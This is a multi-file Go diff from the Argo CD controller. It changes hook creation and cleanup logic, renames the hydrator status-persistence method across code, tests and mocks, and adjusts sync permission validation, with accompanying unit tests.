hydrateValue, hasHydrate := patchedApp.Annotations[v1alpha1.AnnotationKeyHydrate]
assert.True(t, hasHydrate, "hydrate annotation should still exist")
assert.Equal(t, string(v1alpha1.HydrateTypeNormal), hydrateValue)
// Other annotations should be preserved
otherValue, hasOther := patchedApp.Annotations["other-annotation"]
assert.True(t, hasOther, "other annotations should be preserved")
assert.Equal(t, "other-value", otherValue)
})
t.Run("persistAppStatus with explicit annotations", func(t *testing.T) {
app := newFakeApp()
app.Annotations = map[string]string{
v1alpha1.AnnotationKeyRefresh: string(v1alpha1.RefreshTypeNormal),
v1alpha1.AnnotationKeyHydrate: string(v1alpha1.HydrateTypeNormal),
"other-annotation": "other-value",
}
app.Status.Sync.Status = v1alpha1.SyncStatusCodeSynced
app.Status.Health.Status = health.HealthStatusHealthy
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
origApp := app.DeepCopy()
newStatus := app.Status.DeepCopy()
// Create annotations that delete hydrate but keep refresh
newAnnotations := make(map[string]string)
maps.Copy(newAnnotations, origApp.Annotations)
delete(newAnnotations, v1alpha1.AnnotationKeyHydrate)
ctrl.persistAppStatus(origApp, newStatus, newAnnotations)
// Verify the patch was created correctly
patchedApp, err := ctrl.applicationClientset.ArgoprojV1alpha1().Applications(app.Namespace).Get(context.Background(), app.Name, metav1.GetOptions{})
require.NoError(t, err)
// Hydrate annotation should be deleted
_, hasHydrate := patchedApp.Annotations[v1alpha1.AnnotationKeyHydrate]
assert.False(t, hasHydrate, "hydrate annotation should be deleted")
// Refresh annotation should still exist
refreshValue, hasRefresh := patchedApp.Annotations[v1alpha1.AnnotationKeyRefresh]
assert.True(t, hasRefresh, "refresh annotation should still exist")
assert.Equal(t, string(v1alpha1.RefreshTypeNormal), refreshValue)
// Other annotations should be preserved
otherValue, hasOther := patchedApp.Annotations["other-annotation"]
assert.True(t, hasOther, "other annotations should be preserved")
assert.Equal(t, "other-value", otherValue)
})
}

View File

@@ -11,6 +11,7 @@ import (
"github.com/argoproj/argo-cd/gitops-engine/pkg/sync/hook"
"github.com/argoproj/argo-cd/gitops-engine/pkg/utils/kube"
log "github.com/sirupsen/logrus"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/client-go/rest"
@@ -103,6 +104,7 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
revisions = append(revisions, src.TargetRevision)
}
// Fetch target objects from Git to know which hooks should exist
targets, _, _, err := ctrl.appStateManager.GetRepoObjs(context.Background(), app, app.Spec.GetSources(), appLabelKey, revisions, false, false, false, proj, true)
if err != nil {
return false, err
@@ -125,14 +127,14 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
if !isHookOfType(obj, hookType) {
continue
}
if runningHook := runningHooks[kube.GetResourceKey(obj)]; runningHook == nil {
if _, alreadyExists := runningHooks[kube.GetResourceKey(obj)]; !alreadyExists {
expectedHook[kube.GetResourceKey(obj)] = obj
}
}
// Create hooks that don't exist yet
createdCnt := 0
for _, obj := range expectedHook {
for key, obj := range expectedHook {
// Add app instance label so the hook can be tracked and cleaned up
labels := obj.GetLabels()
if labels == nil {
@@ -141,8 +143,13 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
labels[appLabelKey] = app.InstanceName(ctrl.namespace)
obj.SetLabels(labels)
logCtx.Infof("Creating %s hook resource: %s", hookType, key)
_, err = ctrl.kubectl.CreateResource(context.Background(), config, obj.GroupVersionKind(), obj.GetName(), obj.GetNamespace(), obj, metav1.CreateOptions{})
if err != nil {
if apierrors.IsAlreadyExists(err) {
logCtx.Warnf("Hook resource %s already exists, skipping", key)
continue
}
return false, err
}
createdCnt++
@@ -163,7 +170,8 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
progressingHooksCount := 0
var failedHooks []string
var failedHookObjects []*unstructured.Unstructured
for _, obj := range runningHooks {
for key, obj := range runningHooks {
hookHealth, err := health.GetResourceHealth(obj, healthOverrides)
if err != nil {
return false, err
@@ -180,12 +188,17 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
Status: health.HealthStatusHealthy,
}
}
switch hookHealth.Status {
case health.HealthStatusProgressing:
logCtx.Debugf("Hook %s is progressing", key)
progressingHooksCount++
case health.HealthStatusDegraded:
logCtx.Warnf("Hook %s is degraded: %s", key, hookHealth.Message)
failedHooks = append(failedHooks, fmt.Sprintf("%s/%s", obj.GetNamespace(), obj.GetName()))
failedHookObjects = append(failedHookObjects, obj)
case health.HealthStatusHealthy:
logCtx.Debugf("Hook %s is healthy", key)
}
}
@@ -194,7 +207,7 @@ func (ctrl *ApplicationController) executeHooks(hookType HookType, app *appv1.Ap
logCtx.Infof("Deleting %d failed %s hook(s) to allow retry", len(failedHookObjects), hookType)
for _, obj := range failedHookObjects {
err = ctrl.kubectl.DeleteResource(context.Background(), config, obj.GroupVersionKind(), obj.GetName(), obj.GetNamespace(), metav1.DeleteOptions{})
if err != nil {
if err != nil && !apierrors.IsNotFound(err) {
logCtx.WithError(err).Warnf("Failed to delete failed hook %s/%s", obj.GetNamespace(), obj.GetName())
}
}
@@ -241,6 +254,10 @@ func (ctrl *ApplicationController) cleanupHooks(hookType HookType, liveObjs map[
hooks = append(hooks, obj)
}
if len(hooks) == 0 {
return true, nil
}
// Process hooks for deletion
for _, obj := range hooks {
deletePolicies := hook.DeletePolicies(obj)
@@ -267,7 +284,7 @@ func (ctrl *ApplicationController) cleanupHooks(hookType HookType, liveObjs map[
}
logCtx.Infof("Deleting %s hook %s/%s", hookType, obj.GetNamespace(), obj.GetName())
err = ctrl.kubectl.DeleteResource(context.Background(), config, obj.GroupVersionKind(), obj.GetName(), obj.GetNamespace(), metav1.DeleteOptions{})
if err != nil {
if err != nil && !apierrors.IsNotFound(err) {
return false, err
}
}

View File

@@ -3,8 +3,10 @@ package controller
import (
"testing"
"github.com/argoproj/argo-cd/gitops-engine/pkg/utils/kube"
"github.com/stretchr/testify/assert"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime/schema"
)
func TestIsHookOfType(t *testing.T) {
@@ -312,3 +314,174 @@ func TestMultiHookOfType(t *testing.T) {
})
}
}
func TestExecuteHooksAlreadyExistsLogic(t *testing.T) {
newObj := func(name string, annot map[string]string) *unstructured.Unstructured {
obj := &unstructured.Unstructured{}
obj.SetGroupVersionKind(schema.GroupVersionKind{Group: "batch", Version: "v1", Kind: "Job"})
obj.SetName(name)
obj.SetNamespace("default")
obj.SetAnnotations(annot)
return obj
}
tests := []struct {
name string
hookType []HookType
targetAnnot map[string]string
liveAnnot map[string]string // nil -> object doesn't exist in cluster
expectCreated bool
}{
// PRE DELETE TESTS
{
name: "PreDelete (argocd): Not in cluster - should be created",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PreDelete (helm): Not in cluster - should be created",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PreDelete (argocd): Already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
expectCreated: false,
},
{
name: "PreDelete (argocd): Already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
liveAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
expectCreated: false,
},
{
name: "PreDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete", "argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: map[string]string{"helm.sh/hook": "pre-delete"},
expectCreated: false,
},
{
name: "PreDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PreDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "pre-delete", "argocd.argoproj.io/hook": "PreDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete"},
expectCreated: false,
},
// POST DELETE TESTS
{
name: "PostDelete (argocd): Not in cluster - should be created",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PostDelete (helm): Not in cluster - should be created",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete"},
liveAnnot: nil,
expectCreated: true,
},
{
name: "PostDelete (argocd): Already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
expectCreated: false,
},
{
name: "PostDelete (helm): Already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete"},
expectCreated: false,
},
{
name: "PostDelete (helm+argocd): Already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
expectCreated: false,
},
{
name: "PostDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete"},
expectCreated: false,
},
{
name: "PostDelete (helm+argocd): One of two already exists - should be skipped",
hookType: []HookType{PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete", "argocd.argoproj.io/hook": "PostDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PostDelete"},
expectCreated: false,
},
// MULTI HOOK TESTS - SKIP LOGIC
{
name: "Multi-hook (argocd): Target is (Pre,Post), Cluster has (Pre,Post) - should be skipped",
hookType: []HookType{PreDeleteHookType, PostDeleteHookType},
targetAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete,PostDelete"},
liveAnnot: map[string]string{"argocd.argoproj.io/hook": "PreDelete,PostDelete"},
expectCreated: false,
},
{
name: "Multi-hook (helm): Target is (Pre,Post), Cluster has (Pre,Post) - should be skipped",
hookType: []HookType{PreDeleteHookType, PostDeleteHookType},
targetAnnot: map[string]string{"helm.sh/hook": "post-delete,pre-delete"},
liveAnnot: map[string]string{"helm.sh/hook": "post-delete,pre-delete"},
expectCreated: false,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
targetObj := newObj("my-hook", tt.targetAnnot)
targetKey := kube.GetResourceKey(targetObj)
liveObjs := make(map[kube.ResourceKey]*unstructured.Unstructured)
if tt.liveAnnot != nil {
liveObjs[targetKey] = newObj("my-hook", tt.liveAnnot)
}
runningHooks := map[kube.ResourceKey]*unstructured.Unstructured{}
for key, obj := range liveObjs {
for _, hookType := range tt.hookType {
if isHookOfType(obj, hookType) {
runningHooks[key] = obj
}
}
}
expectedHooksToCreate := map[kube.ResourceKey]*unstructured.Unstructured{}
targets := []*unstructured.Unstructured{targetObj}
for _, obj := range targets {
for _, hookType := range tt.hookType {
if !isHookOfType(obj, hookType) {
continue
}
}
objKey := kube.GetResourceKey(obj)
if _, alreadyExists := runningHooks[objKey]; !alreadyExists {
expectedHooksToCreate[objKey] = obj
}
}
if tt.expectCreated {
assert.NotEmpty(t, expectedHooksToCreate, "Expected hook to be marked for creation")
} else {
assert.Empty(t, expectedHooksToCreate, "Expected hook to be skipped (already exists)")
}
})
}
}

View File

@@ -60,8 +60,8 @@ type Dependencies interface {
// trigger a refresh after the application has been hydrated and a new commit has been pushed.
RequestAppRefresh(appName string, appNamespace string) error
// PersistHydrationStatus persists the application status for the source hydrator.
PersistHydrationStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus)
// PersistAppHydratorStatus persists the application status for the source hydrator.
PersistAppHydratorStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus)
// AddHydrationQueueItem adds a hydration queue item to the queue. This is used to trigger the hydration process for
// a group of applications which are hydrating to the same repo and target branch.
@@ -123,10 +123,9 @@ func (h *Hydrator) ProcessAppHydrateQueueItem(origApp *appv1.Application) {
Phase: appv1.HydrateOperationPhaseHydrating,
SourceHydrator: *app.Spec.SourceHydrator,
}
h.dependencies.PersistAppHydratorStatus(origApp, &app.Status.SourceHydrator)
}
h.dependencies.PersistHydrationStatus(origApp, &app.Status.SourceHydrator)
needsRefresh := app.Status.SourceHydrator.CurrentOperation.Phase == appv1.HydrateOperationPhaseHydrating && metav1.Now().Sub(app.Status.SourceHydrator.CurrentOperation.StartedAt.Time) > h.statusRefreshTimeout
if needsHydration || needsRefresh {
logCtx.WithField("reason", reason).Info("Hydrating app")
@@ -253,7 +252,7 @@ func (h *Hydrator) ProcessHydrationQueueItem(hydrationKey types.HydrationQueueKe
HydratedSHA: hydratedSHA,
SourceHydrator: app.Status.SourceHydrator.CurrentOperation.SourceHydrator,
}
h.dependencies.PersistHydrationStatus(origApp, &app.Status.SourceHydrator)
h.dependencies.PersistAppHydratorStatus(origApp, &app.Status.SourceHydrator)
// Request a refresh since we pushed a new commit.
err := h.dependencies.RequestAppRefresh(app.Name, app.Namespace)
@@ -275,7 +274,7 @@ func (h *Hydrator) setAppHydratorError(app *appv1.Application, err error) {
failedAt := metav1.Now()
app.Status.SourceHydrator.CurrentOperation.FinishedAt = &failedAt
app.Status.SourceHydrator.CurrentOperation.Message = fmt.Sprintf("Failed to hydrate: %v", err.Error())
h.dependencies.PersistHydrationStatus(origApp, &app.Status.SourceHydrator)
h.dependencies.PersistAppHydratorStatus(origApp, &app.Status.SourceHydrator)
}
// getAppsForHydrationKey returns the applications matching the hydration key.

View File

@@ -394,7 +394,7 @@ func TestProcessAppHydrateQueueItem_HydrationNeeded(t *testing.T) {
app.Status.SourceHydrator.CurrentOperation = nil
var persistedStatus *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
persistedStatus = newStatus
}).Return().Once()
d.EXPECT().AddHydrationQueueItem(mock.Anything).Return().Once()
@@ -406,7 +406,7 @@ func TestProcessAppHydrateQueueItem_HydrationNeeded(t *testing.T) {
h.ProcessAppHydrateQueueItem(app)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "AddHydrationQueueItem", mock.Anything)
require.NotNil(t, persistedStatus)
@@ -433,7 +433,6 @@ func TestProcessAppHydrateQueueItem_HydrationPassedTimeout(t *testing.T) {
},
}
d.EXPECT().AddHydrationQueueItem(mock.Anything).Return().Once()
d.EXPECT().PersistHydrationStatus(app, &app.Status.SourceHydrator).Return().Once()
h := &Hydrator{
dependencies: d,
@@ -443,7 +442,7 @@ func TestProcessAppHydrateQueueItem_HydrationPassedTimeout(t *testing.T) {
h.ProcessAppHydrateQueueItem(app)
d.AssertCalled(t, "AddHydrationQueueItem", mock.Anything)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
}
func TestProcessAppHydrateQueueItem_NoSourceHydrator(t *testing.T) {
@@ -459,7 +458,7 @@ func TestProcessAppHydrateQueueItem_NoSourceHydrator(t *testing.T) {
h.ProcessAppHydrateQueueItem(app)
// Should not call anything
d.AssertNotCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "AddHydrationQueueItem", mock.Anything)
}
@@ -477,15 +476,14 @@ func TestProcessAppHydrateQueueItem_HydrationNotNeeded(t *testing.T) {
},
}
d.EXPECT().PersistHydrationStatus(app, &app.Status.SourceHydrator).Return().Once()
h := &Hydrator{
dependencies: d,
statusRefreshTimeout: time.Minute,
}
h.ProcessAppHydrateQueueItem(app)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
// Should not call anything
d.AssertNotCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertNotCalled(t, "AddHydrationQueueItem", mock.Anything)
}
@@ -506,7 +504,7 @@ func TestProcessHydrationQueueItem_ValidationFails(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus1 *v1alpha1.SourceHydratorStatus
var persistedStatus2 *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
switch orig.Name {
case app1.Name:
persistedStatus1 = newStatus
@@ -526,7 +524,7 @@ func TestProcessHydrationQueueItem_ValidationFails(t *testing.T) {
assert.Contains(t, persistedStatus2.CurrentOperation.Message, "cannot hydrate because application default/test-app has an error")
assert.Equal(t, v1alpha1.HydrateOperationPhaseFailed, persistedStatus1.CurrentOperation.Phase)
d.AssertNumberOfCalls(t, "PersistHydrationStatus", 2)
d.AssertNumberOfCalls(t, "PersistAppHydratorStatus", 2)
d.AssertNotCalled(t, "RequestAppRefresh", mock.Anything, mock.Anything)
}
@@ -550,7 +548,7 @@ func TestProcessHydrationQueueItem_HydrateFails_AppSpecificError(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus1 *v1alpha1.SourceHydratorStatus
var persistedStatus2 *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
switch orig.Name {
case app1.Name:
persistedStatus1 = newStatus
@@ -570,7 +568,7 @@ func TestProcessHydrationQueueItem_HydrateFails_AppSpecificError(t *testing.T) {
assert.Contains(t, persistedStatus2.CurrentOperation.Message, "cannot hydrate because application default/test-app has an error")
assert.Equal(t, v1alpha1.HydrateOperationPhaseFailed, persistedStatus1.CurrentOperation.Phase)
d.AssertNumberOfCalls(t, "PersistHydrationStatus", 2)
d.AssertNumberOfCalls(t, "PersistAppHydratorStatus", 2)
d.AssertNotCalled(t, "RequestAppRefresh", mock.Anything, mock.Anything)
}
@@ -595,7 +593,7 @@ func TestProcessHydrationQueueItem_HydrateFails_CommonError(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus1 *v1alpha1.SourceHydratorStatus
var persistedStatus2 *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
switch orig.Name {
case app1.Name:
persistedStatus1 = newStatus
@@ -617,7 +615,7 @@ func TestProcessHydrationQueueItem_HydrateFails_CommonError(t *testing.T) {
assert.Equal(t, v1alpha1.HydrateOperationPhaseFailed, persistedStatus1.CurrentOperation.Phase)
assert.Equal(t, "abc123", persistedStatus1.CurrentOperation.DrySHA)
d.AssertNumberOfCalls(t, "PersistHydrationStatus", 2)
d.AssertNumberOfCalls(t, "PersistAppHydratorStatus", 2)
d.AssertNotCalled(t, "RequestAppRefresh", mock.Anything, mock.Anything)
}
@@ -635,7 +633,7 @@ func TestProcessHydrationQueueItem_SuccessfulHydration(t *testing.T) {
// Expect setAppHydratorError to be called
var persistedStatus *v1alpha1.SourceHydratorStatus
d.EXPECT().PersistHydrationStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
d.EXPECT().PersistAppHydratorStatus(mock.Anything, mock.Anything).Run(func(_ *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
persistedStatus = newStatus
}).Return().Once()
d.EXPECT().RequestAppRefresh(app.Name, app.Namespace).Return(nil).Once()
@@ -652,7 +650,7 @@ func TestProcessHydrationQueueItem_SuccessfulHydration(t *testing.T) {
h.ProcessHydrationQueueItem(hydrationKey)
d.AssertCalled(t, "PersistHydrationStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "PersistAppHydratorStatus", mock.Anything, mock.Anything)
d.AssertCalled(t, "RequestAppRefresh", app.Name, app.Namespace)
assert.NotNil(t, persistedStatus)
assert.Equal(t, app.Status.SourceHydrator.CurrentOperation.StartedAt, persistedStatus.CurrentOperation.StartedAt)

View File

@@ -525,25 +525,25 @@ func (_c *Dependencies_GetWriteCredentials_Call) RunAndReturn(run func(ctx conte
return _c
}
// PersistHydrationStatus provides a mock function for the type Dependencies
func (_mock *Dependencies) PersistHydrationStatus(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
// PersistAppHydratorStatus provides a mock function for the type Dependencies
func (_mock *Dependencies) PersistAppHydratorStatus(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus) {
_mock.Called(orig, newStatus)
return
}
// Dependencies_PersistHydrationStatus_Call is a *mock.Call that shadows Run/Return methods with type explicit version for method 'PersistHydrationStatus'
type Dependencies_PersistHydrationStatus_Call struct {
// Dependencies_PersistAppHydratorStatus_Call is a *mock.Call that shadows Run/Return methods with type explicit version for method 'PersistAppHydratorStatus'
type Dependencies_PersistAppHydratorStatus_Call struct {
*mock.Call
}
// PersistHydrationStatus is a helper method to define mock.On call
// PersistAppHydratorStatus is a helper method to define mock.On call
// - orig *v1alpha1.Application
// - newStatus *v1alpha1.SourceHydratorStatus
func (_e *Dependencies_Expecter) PersistHydrationStatus(orig interface{}, newStatus interface{}) *Dependencies_PersistHydrationStatus_Call {
return &Dependencies_PersistHydrationStatus_Call{Call: _e.mock.On("PersistHydrationStatus", orig, newStatus)}
func (_e *Dependencies_Expecter) PersistAppHydratorStatus(orig interface{}, newStatus interface{}) *Dependencies_PersistAppHydratorStatus_Call {
return &Dependencies_PersistAppHydratorStatus_Call{Call: _e.mock.On("PersistAppHydratorStatus", orig, newStatus)}
}
func (_c *Dependencies_PersistHydrationStatus_Call) Run(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistHydrationStatus_Call {
func (_c *Dependencies_PersistAppHydratorStatus_Call) Run(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistAppHydratorStatus_Call {
_c.Call.Run(func(args mock.Arguments) {
var arg0 *v1alpha1.Application
if args[0] != nil {
@@ -561,12 +561,12 @@ func (_c *Dependencies_PersistHydrationStatus_Call) Run(run func(orig *v1alpha1.
return _c
}
func (_c *Dependencies_PersistHydrationStatus_Call) Return() *Dependencies_PersistHydrationStatus_Call {
func (_c *Dependencies_PersistAppHydratorStatus_Call) Return() *Dependencies_PersistAppHydratorStatus_Call {
_c.Call.Return()
return _c
}
func (_c *Dependencies_PersistHydrationStatus_Call) RunAndReturn(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistHydrationStatus_Call {
func (_c *Dependencies_PersistAppHydratorStatus_Call) RunAndReturn(run func(orig *v1alpha1.Application, newStatus *v1alpha1.SourceHydratorStatus)) *Dependencies_PersistAppHydratorStatus_Call {
_c.Run(run)
return _c
}

View File

@@ -3,7 +3,6 @@ package controller
import (
"context"
"fmt"
"maps"
"github.com/argoproj/argo-cd/v3/controller/hydrator/types"
appv1 "github.com/argoproj/argo-cd/v3/pkg/apis/application/v1alpha1"
@@ -89,13 +88,10 @@ func (ctrl *ApplicationController) RequestAppRefresh(appName string, appNamespac
return nil
}
func (ctrl *ApplicationController) PersistHydrationStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus) {
newAnnotations := make(map[string]string)
maps.Copy(newAnnotations, orig.GetAnnotations())
delete(newAnnotations, appv1.AnnotationKeyHydrate)
func (ctrl *ApplicationController) PersistAppHydratorStatus(orig *appv1.Application, newStatus *appv1.SourceHydratorStatus) {
status := orig.Status.DeepCopy()
status.SourceHydrator = *newStatus
ctrl.persistAppStatus(orig, status, newAnnotations)
ctrl.persistAppStatus(orig, status)
}
func (ctrl *ApplicationController) AddHydrationQueueItem(key types.HydrationQueueKey) {

View File

@@ -222,10 +222,7 @@ func createConsistentHashingWithBoundLoads(replicas int, getCluster clusterAcces
}
shardIndexedByCluster[c.ID], err = strconv.Atoi(clusterIndex)
if err != nil {
log.Errorf("Failed to get shard index from consistent hashing, error=%v", err)
// No continue here: strconv.Atoi returns 0 on failure, so the cluster falls back to shard 0.
// This is intentional since shard 0 always exists (replicas > 0 is enforced by the caller),
// so the cluster remains reconciled rather than being silently dropped.
log.Errorf("Consistent Hashing was supposed to return a shard index but it returned %d", err)
}
numApps, ok := appDistribution[c.Server]
if !ok {

View File

@@ -847,10 +847,9 @@ func (m *appStateManager) CompareAppState(app *v1alpha1.Application, project *v1
if err != nil {
log.Errorf("CompareAppState error getting server side diff dry run applier: %s", err)
conditions = append(conditions, v1alpha1.ApplicationCondition{Type: v1alpha1.ApplicationConditionUnknownError, Message: err.Error(), LastTransitionTime: &now})
} else {
defer cleanup()
diffConfigBuilder.WithServerSideDryRunner(diff.NewK8sServerSideDryRunner(applier))
}
defer cleanup()
diffConfigBuilder.WithServerSideDryRunner(diff.NewK8sServerSideDryRunner(applier))
}
// enable structured merge diff if application syncs with server-side apply

View File

@@ -6,6 +6,7 @@ import (
"fmt"
"os"
"strconv"
"strings"
"time"
"k8s.io/apimachinery/pkg/util/strategicpatch"
@@ -32,16 +33,20 @@ import (
applog "github.com/argoproj/argo-cd/v3/util/app/log"
"github.com/argoproj/argo-cd/v3/util/argo"
"github.com/argoproj/argo-cd/v3/util/argo/diff"
"github.com/argoproj/argo-cd/v3/util/glob"
kubeutil "github.com/argoproj/argo-cd/v3/util/kube"
logutils "github.com/argoproj/argo-cd/v3/util/log"
"github.com/argoproj/argo-cd/v3/util/lua"
"github.com/argoproj/argo-cd/v3/util/settings"
)
const (
// EnvVarSyncWaveDelay is an environment variable which controls the delay in seconds between
// each sync-wave
EnvVarSyncWaveDelay = "ARGOCD_SYNC_WAVE_DELAY"
// serviceAccountDisallowedCharSet contains the characters that are not allowed to be present
// in a DefaultServiceAccount configured for a DestinationServiceAccount
serviceAccountDisallowedCharSet = "!*[]{}\\/"
)
func (m *appStateManager) getOpenAPISchema(server *v1alpha1.Cluster) (openapi.Resources, error) {
@@ -283,7 +288,7 @@ func (m *appStateManager) SyncAppState(app *v1alpha1.Application, project *v1alp
return
}
if impersonationEnabled {
serviceAccountToImpersonate, err := settings.DeriveServiceAccountToImpersonate(project, app, destCluster)
serviceAccountToImpersonate, err := deriveServiceAccountToImpersonate(project, app, destCluster)
if err != nil {
state.Phase = common.OperationError
state.Message = fmt.Sprintf("failed to find a matching service account to impersonate: %v", err)
@@ -303,9 +308,22 @@ func (m *appStateManager) SyncAppState(app *v1alpha1.Application, project *v1alp
sync.WithLogr(logutils.NewLogrusLogger(logEntry)),
sync.WithHealthOverride(lua.ResourceHealthOverrides(resourceOverrides)),
sync.WithPermissionValidator(func(un *unstructured.Unstructured, res *metav1.APIResource) error {
return validateSyncPermissions(project, destCluster, func(proj string) ([]*v1alpha1.Cluster, error) {
return m.db.GetProjectClusters(context.TODO(), proj)
}, un, res)
if !project.IsGroupKindNamePermitted(un.GroupVersionKind().GroupKind(), un.GetName(), res.Namespaced) {
return fmt.Errorf("resource %s:%s is not permitted in project %s", un.GroupVersionKind().Group, un.GroupVersionKind().Kind, project.Name)
}
if res.Namespaced {
permitted, err := project.IsDestinationPermitted(destCluster, un.GetNamespace(), func(project string) ([]*v1alpha1.Cluster, error) {
return m.db.GetProjectClusters(context.TODO(), project)
})
if err != nil {
return err
}
if !permitted {
return fmt.Errorf("namespace %v is not permitted in project '%s'", un.GetNamespace(), project.Name)
}
}
return nil
}),
sync.WithOperationSettings(syncOp.DryRun, syncOp.Prune, syncOp.SyncStrategy.Force(), syncOp.IsApplyStrategy() || len(syncOp.Resources) > 0),
sync.WithInitialState(state.Phase, state.Message, initialResourcesRes, state.StartedAt),
@@ -553,32 +571,37 @@ func syncWindowPreventsSync(app *v1alpha1.Application, proj *v1alpha1.AppProject
return !canSync, nil
}
// validateSyncPermissions checks whether the given resource is permitted by the project's
// allow/deny lists and destination rules. It returns an error if the API resource info is nil
// (preventing a nil-pointer panic), if the resource's group/kind is not permitted, or if
// the resource's namespace is not an allowed destination.
func validateSyncPermissions(
project *v1alpha1.AppProject,
destCluster *v1alpha1.Cluster,
getProjectClusters func(string) ([]*v1alpha1.Cluster, error),
un *unstructured.Unstructured,
res *metav1.APIResource,
) error {
if res == nil {
